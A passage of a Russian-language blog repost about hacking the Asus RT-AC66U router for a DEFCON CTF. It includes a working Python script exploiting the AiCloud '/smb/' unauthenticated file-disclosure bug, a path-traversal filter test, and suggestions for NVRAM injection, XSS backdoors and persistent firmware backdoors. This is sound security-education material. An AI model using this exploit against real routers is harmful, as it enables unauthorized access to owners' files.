width=\"400\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e58\/485\/eb4\/e58485eb4a8561c5052f2dee0267d847.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e58\/485\/eb4\/e58485eb4a8561c5052f2dee0267d847.png\" height=\"276\" width=\"640\"\/><\/a><\/p>\n<p>  \u0412\u044b \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u044d\u043d\u0442\u0440\u043e\u043f\u0438\u044e \u043a\u043b\u044e\u0447\u0435\u0439, \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0413\u043b\u044f\u043d\u044c\u0442\u0435 \u0441\u043b\u0430\u0439\u0434\u044b <a href=\"http:\/\/events.ccc.de\/congress\/2013\/Fahrplan\/system\/attachments\/2226\/original\/Scanning-30c3-13.pdf\">\u00abFast Internet-wide Scanning and its Security Applications\u00bb<\/a>, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u0447\u0435\u0440\u043f\u043d\u0443\u0442\u044c \u043f\u0430\u0440\u0443 \u0438\u0434\u0435\u0439.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/2ce\/ff7\/0b8\/2ceff70b8eaec7af2ac41ceb93340af2.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/2ce\/ff7\/0b8\/2ceff70b8eaec7af2ac41ceb93340af2.png\" height=\"271\" width=\"400\"\/><\/a><\/p>\n<h5>\u0412\u0435\u0431<\/h5>\n<p>  \u0415\u0441\u0442\u044c \u0442\u0430\u043a \u043c\u043d\u043e\u0433\u043e \u0442\u0435\u0445\u043d\u0438\u043a \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0435\u0431-\u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u044f \u0441\u0444\u043e\u043a\u0443\u0441\u0438\u0440\u0443\u044e\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u043f\u0430\u0440\u0435 \u0438\u0437 \u043d\u0438\u0445. \u0423 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 \u0440\u043e\u0443\u0442\u0435\u0440\u0430 \u043d\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 CSRF. \u0422\u0430\u043a\u0436\u0435 \u0435\u0441\u0442\u044c \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0438\u043d\u0436\u0435\u043a\u0442 \u0432 ping-\u043a\u043e\u043c\u0430\u043d\u0434\u0435 \u0438 \u043a\u0443\u0447\u0430 \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u0432 XSS.<\/p>\n<p>  HTTP-\u0434\u0435\u043c\u043e\u043d \u043e\u0441\u043d\u043e\u0432\u0430\u043d \u043d\u0430 microhttpd. \u0422\u0443\u0442 \u0435\u0441\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u0430\u044f \u0437\u0430\u0449\u0438\u0442\u0430 \u043e\u0442 \u0432\u044b\u0445\u043e\u0434\u0430 \u0438\u0437 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0432 httpd.c:<\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/d8f\/541\/c76\/d8f541c768474a958f4cd0d622a8ff0d.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/d8f\/541\/c76\/d8f541c768474a958f4cd0d622a8ff0d.png\" height=\"139\" width=\"640\"\/><\/a><\/p>\n<p>  \u041c\u044b \u043c\u043e\u0436\u0435\u043c \u0431\u0435\u0441\u0441\u0442\u044b\u0434\u043d\u043e \u0441\u0442\u0430\u0449\u0438\u0442\u044c <a href=\"http:\/\/www.exploit-db.com\/download_pdf\/18094\/\">\u0438\u0434\u0435\u044e<\/a> <a href=\"https:\/\/twitter.com\/hackerfantastic\">hackerfantastic<\/a> \u0438 \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u0445\u043e\u0434\u044b \u0437\u0430\u0449\u0438\u0442\u044b:  <\/p>\n<pre><code>#include &lt;stdio.h&gt; #include &lt;string.h&gt;  int main(int argc, char *argv[]){     char *file;     int len;     file = argv[1];     len = strlen(file);     if ( file[0] == '\/' || strcmp( file, &quot;..&quot; ) == 0 || strncmp( file, &quot;..\/&quot;, 3 ) == 0 || strstr( file, &quot;\/..\/&quot; ) != (char*) 0 || strcmp( &(file[len-3]), &quot;\/..&quot; ) == 0 )     {         printf (&quot;Illegal filename:  %s\\n&quot;, file);     }     else     {         printf (&quot;Accepted filename: %s\\n&quot;, file);     }     return 0; }<\/code><\/pre>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a42\/43c\/f30\/a4243cf3091c85f7ae09124472ffcef6.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a42\/43c\/f30\/a4243cf3091c85f7ae09124472ffcef6.png\" height=\"261\" width=\"400\"\/><\/a><\/p>\n<p>  \u0412 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0435\u0441\u0442\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 MIME, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u00ab\u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u043b\u0438 \u0431\u044b\u0442\u044c \u0443\u0431\u0440\u0430\u043d\u044b\u00bb  <\/p>\n<pre><code>\/\/ some should be removed struct except_mime_handler except_mime_handlers[] = { { &quot;QIS_*&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},\t { &quot;qis\/*&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},\t { &quot;*.css&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;state.js&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;detect.js&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;popup.js&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;general.js&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;help.js&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;start_autodet.asp&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;start_apply.htm&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;start_apply2.htm&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;setting_lan.htm&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;httpd_check.htm&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;status.asp&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;automac.asp&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;detecWAN.asp&quot;, MIME_EXCEPTION_NORESETTIME}, { &quot;detecWAN2.asp&quot;, MIME_EXCEPTION_NORESETTIME}, { &quot;WPS_info.asp&quot;, MIME_EXCEPTION_NORESETTIME}, { &quot;WAN_info.asp&quot;, MIME_EXCEPTION_NOAUTH_ALL|MIME_EXCEPTION_NORESETTIME}, { &quot;result_of_get_changed_status.asp&quot;, MIME_EXCEPTION_NORESETTIME}, { &quot;result_of_get_changed_status_QIS.asp&quot;, MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { &quot;result_of_detect_client.asp&quot;, MIME_EXCEPTION_NORESETTIME}, { &quot;Nologin.asp&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;alertImg.gif&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;error_page.htm&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;jquery.js&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;gotoHomePage.htm&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;update_appstate.asp&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;update_cloudstatus.asp&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;get_webdavInfo.asp&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;*.gz&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;*.tgz&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;*.zip&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { &quot;*.ipk&quot;, MIME_EXCEPTION_NOAUTH_ALL}, { NULL, 0 } };<\/code><\/pre>\n<p>  \u0424\u0430\u0439\u043b get_webdavInfo.asp \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u0430\u0436\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0438 \u0441\u0435\u0442\u0438:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a12\/4ee\/c7d\/a124eec7d5ad6c4e30ce8102185ff9aa.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a12\/4ee\/c7d\/a124eec7d5ad6c4e30ce8102185ff9aa.png\" height=\"116\" width=\"400\"\/><\/a><\/p>\n<p>  \u041c\u044b \u043c\u043e\u0436\u0435\u043c \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0432 nvram, \u0447\u0442\u043e\u0431\u044b \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c XSS-\u0431\u0435\u043a\u0434\u043e\u0440 \u043d\u0430 \u044d\u0442\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/805\/30f\/40c\/80530f40c65bedadfcfcb925de42f9cf.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/805\/30f\/40c\/80530f40c65bedadfcfcb925de42f9cf.png\" height=\"231\" width=\"400\"\/><\/a><\/p>\n<p>  \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0444\u0443\u043d\u043a\u0438\u0446\u0438\u0438 nvram_get \u0438 nvram_safe_get. \u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438, \u0431\u044b\u0432\u0430\u0435\u0442, \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u044e nvram_set. \u0415\u0441\u043b\u0438 \u0440\u043e\u0443\u0442\u0435\u0440 \u043d\u0435 \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0441 NVRAM, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0432\u0440\u043e\u0434\u0435 NVRAM-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 (%0A, %0D \u0438 `reboot` \u0432\u0441\u0435\u0433\u0434\u0430 \u0431\u0443\u0434\u0443\u0442 \u0432\u0430\u0448\u0438\u043c\u0438 \u043f\u043e\u043c\u043e\u0449\u043d\u0438\u043a\u0430\u043c\u0438 \u0432 \u044d\u0442\u043e\u043c \u0434\u0435\u043b\u0435).<\/p>\n<p>  AiCloud \u2014 <b>\u043e\u0447\u0435\u043d\u044c<\/b> \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e <a href=\"http:\/\/www.securityfocus.com\/archive\/1\/526942\">\u043b\u0435\u0433\u043a\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c<\/a>. \u041a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u0443\u0435\u0442\u0435 \u0435\u0433\u043e \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043d\u0430 \u0440\u043e\u0443\u0442\u0435\u0440\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f lighttpd \u043d\u0430 \u043f\u043e\u0440\u0442\u0443 8082 (\u0438\u043b\u0438 443 \u043d\u0430 \u043d\u043e\u0432\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438) \u0438 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u0442 \u0434\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0432\u0430\u0448\u0438\u043c \u0444\u0430\u0439\u043b\u0430\u043c \u043e\u043d\u043b\u0430\u0439\u043d. \u041f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u0438\u0430\u043b\u043e\u0433 \u0432\u0432\u043e\u0434\u0430 \u043b\u043e\u0433\u0438\u043d\u0430 \u0438 \u043f\u0430\u0440\u043e\u043b\u044f \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u043e\u0439\u0442\u0438, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \/smb\/ \u043a URL (\u0447\u0438\u0442\u0430\u0439\u0442\u0435 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0438!)<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/37d\/79a\/045\/37d79a045c3e4cf67a0dbc518d81bbc9.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/37d\/79a\/045\/37d79a045c3e4cf67a0dbc518d81bbc9.png\" height=\"300\" width=\"320\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a5f\/0ab\/4b6\/a5f0ab4b6b7de4a058095ff37f43bea1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a5f\/0ab\/4b6\/a5f0ab4b6b7de4a058095ff37f43bea1.png\" height=\"295\" width=\"400\"\/><\/a><\/p>\n<p>  \u042f \u043d\u0430\u043f\u0438\u0441\u0430\u043b \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u0431\u0430\u0433\u0430 \u0432 AiCloud \u043d\u0430 RT-AC66U v3.0.0.4.266. \u041e\u043d \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0432\u0441\u0435 \u0444\u0430\u0439\u043b\u044b \u0438 \u043f\u0443\u0442\u0438 \u043d\u0430 \u0440\u043e\u0443\u0442\u0435\u0440\u0435, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u0441 USB-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.<\/p>\n<pre><code>#!\/usr\/bin\/python  from bs4 import BeautifulSoup import urllib2 import sys  def list_dir(url, start_dir): \ttry: \t\thtml_page = urllib2.urlopen(url+start_dir) \texcept urllib2.HTTPError as e: \t\tprint e \t\tsys.exit(1) \tsoup = BeautifulSoup(html_page) \tfor link in soup.findAll('a'): \t\tpath = link.get('uhref') \t\tif path != '..\/': \t\t\tis_dir = link.get('isdir') \t\t\tif  is_dir == str('1'): \t\t\t\tprint url+path \t\t\t\tlist_dir(url,path) \t\t\telse: \t\t\t\tprint url+path  nargs = len(sys.argv) if nargs == 2: \turl = sys.argv[1] \tstart_dir = &quot;\/smb&quot; elif nargs == 3: \turl = sys.argv[1] \tstart_dir = str(sys.argv[2]) else: \tprint 'Asus RT-AC66U AiCloud Unauthenticated File Disclosure\\ \t\t  \\nTested Firmwares: 3.0.0.4.266, 3.0.0.4.270 and 3.0.0.4.354\\ \t\t  \\nDisclosed by Kyle Lovett\\ \t\t  \\nScript by Bernardo Rodrigues - http:\/\/w00tsec.blogspot.com\\ \t\t  \\nUsage: python %s http:\/\/url [path]' % sys.argv[0] \tsys.exit(1)  list_dir(url, start_dir) <\/code><\/pre>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/8d2\/592\/288\/8d2592288250ceaff2a47b758ec9dc4b.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/8d2\/592\/288\/8d2592288250ceaff2a47b758ec9dc4b.png\" height=\"262\" width=\"400\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/397\/335\/2e7\/3973352e7b275a637c4e7d6f73313b32.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/397\/335\/2e7\/3973352e7b275a637c4e7d6f73313b32.png\" height=\"97\" width=\"400\"\/><\/a><\/p>\n<p>  \u0418 \u043d\u0430\u043f\u043e\u0441\u043b\u0435\u0434\u043e\u043a, \u043d\u0435 \u0437\u0430\u0431\u0443\u0434\u044c\u0442\u0435 \u0441\u0440\u0430\u0432\u043d\u0438\u0442\u044c \u0440\u0430\u0437\u043d\u0438\u0446\u0443 \u0432 \u0444\u0430\u0439\u043b\u0430\u0445 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 www. \u041f\u043e \u044d\u0442\u043e\u043c\u0443 \u043f\u0443\u0442\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432\u0441\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/06e\/38e\/55b\/06e38e55bc651787474eb08d66839398.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/06e\/38e\/55b\/06e38e55bc651787474eb08d66839398.png\" height=\"227\" width=\"400\"\/><\/a><\/p>\n<h5>\u0411\u043e\u043d\u0443\u0441<\/h5>\n<p>  \u041f\u043e\u0447\u0435\u043c\u0443-\u0431\u044b \u043d\u0435 \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u043a\u0440\u044b\u0448\u043a\u0443 \u0440\u043e\u0443\u0442\u0435\u0440\u0430, \u043d\u0435 \u043f\u043e\u0432\u0440\u0435\u0434\u0438\u0432 \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0439\u043d\u0443\u044e \u043f\u043b\u043e\u043c\u0431\u0443? \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0432\u0430\u043c \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u044f\u0442\u0441\u044f \u0441\u043e\u0432\u0435\u0442\u044b \u043e\u0442 \u0440\u0435\u0431\u044f\u0442 \u0438\u0437 <a href=\"http:\/\/defcne.net\/villages\/22\/17\">DEFCON Tamber Evident Village<\/a>.<\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/61f\/925\/544\/61f9255440160905553f1f9bee6c4d02.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/61f\/925\/544\/61f9255440160905553f1f9bee6c4d02.png\" height=\"400\" width=\"348\"\/><\/a><\/p>\n<h5>\u0414\u0440\u0443\u0433\u043e\u0435 (\u0432\u0440\u043e\u0434\u0435 \u0437\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f)<\/h5>\n<p>  \u0412\u0437\u043b\u043e\u043c Asus RT-AC66U \u2014 \u043e\u0442\u043b\u0438\u0447\u043d\u043e\u0435 \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043d\u043e\u0432\u0438\u0447\u043a\u043e\u0432 \u0432\u043e \u0432\u0437\u043b\u043e\u043c\u0435 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432. \u0411\u043e\u0301\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0435\u0441\u0442\u044c \u0432 \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435, \u0438 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u043a\u0443\u0447\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043d\u0435\u0433\u043e. \u0412\u044b \u043c\u043e\u0433\u043b\u0438 \u0438 \u043d\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u043d\u043e \u043c\u044b \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043a\u0430\u0436\u0434\u044b\u0439 \u043f\u0443\u043d\u043a\u0442 \u0438\u0437 <a href=\"https:\/\/www.owasp.org\/index.php\/OWASP_Internet_of_Things_Top_Ten_Project#tab=OWASP_Internet_of_Things_Top_10_for_2014\">OWASP Internet of Things Top 10<\/a>. \u0425\u043e\u0434\u044f\u0442 \u0441\u043b\u0443\u0445\u0438, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0440\u043e\u0443\u0442\u0435\u0440 \u0431\u0443\u0434\u0435\u0442 \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 OWASP IoT Webgoat \u0438 Damn Vulnerable Embedded Linux.<\/p>\n<p>  \u0412\u043e\u0442 \u0435\u0449\u0435 \u043f\u0430\u0440\u043e\u0447\u043a\u0430 \u043f\u043e\u0434\u0445\u043e\u0434\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0430\u043c \u043c\u043e\u0433\u0443\u0442 \u0434\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0447\u043a\u0438 \u0432 \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u0438:  <\/p>\n<ul>\n<li>\u041f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u0434\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 \u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 dual-boot \u0441 backdoor<\/li>\n<li>\u0414\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u0435 backdoor \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u043d\u0435 \u0443\u0434\u0430\u043b\u044f\u043b\u0441\u044f \u043f\u0440\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438<\/li>\n<li>\u041e\u043a\u0438\u0440\u043f\u0438\u0447\u0438\u0432\u0430\u043d\u0438\u0435 \u0440\u043e\u0443\u0442\u0435\u0440\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e<\/li>\n<li>\u041f\u0435\u0440\u0435\u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 LED \u043d\u0430 \u0438\u0433\u0440\u0443 \u0432 PONG<\/li>\n<\/ul>\n<p>  \u0415\u0441\u0442\u044c \u0435\u0449\u0435 \u043a\u0443\u0447\u0430 \u0432\u0435\u0449\u0435\u0439, \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u044f \u0445\u043e\u0447\u0443 \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c, \u043d\u043e \u043f\u0440\u0438\u0434\u0435\u0440\u0436\u0443 \u0438\u0445 \u0434\u043b\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u043f\u043e\u0441\u0442\u043e\u0432. \u0415\u0441\u043b\u0438 \u0432\u044b \u043d\u0430\u043c\u0435\u0440\u0435\u043d\u044b \u0443\u0447\u0430\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0432 SOHOpelesslyBroken CTF \u0438 \u043d\u0430\u0448\u043b\u0438 \u044d\u0442\u0443 \u0441\u0442\u0430\u0442\u044c\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439, \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0432 \u043b\u044e\u0431\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043d\u0443\u0442\u044c \u043c\u0435\u043d\u044f \u0438 \u043f\u043e\u043f\u0438\u0442\u044c \u0441\u043e \u043c\u043d\u043e\u0439 \u043a\u043e\u0444\u0435 \u0432\u043e \u0432\u0440\u0435\u043c\u044f DEFCON\/BsidesLV\/Blackhat =)   \t<\/p>\n<div class=\"clear\"><\/div>\n<\/p><\/div>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"http:\/\/habrahabr.ru\/post\/230469\/\"> http:\/\/habrahabr.ru\/post\/230469\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"content html_format\">       \u041d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043d\u0430\u0441\u0442\u0430\u043b \u0438\u044e\u043b\u044c, \u0432\u0440\u0435\u043c\u044f \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c\u0441\u044f \u043d\u0430 DEFCON. \u0424\u043e\u043b\u043b\u043e\u0432\u044c\u0442\u0435 <a href=\"https:\/\/twitter.com\/defconparties\">@defconparties<\/a> \u0432 \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435 \u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0439\u0442\u0435\u0441\u044c, \u043a\u0430\u043a\u0438\u0435 <a 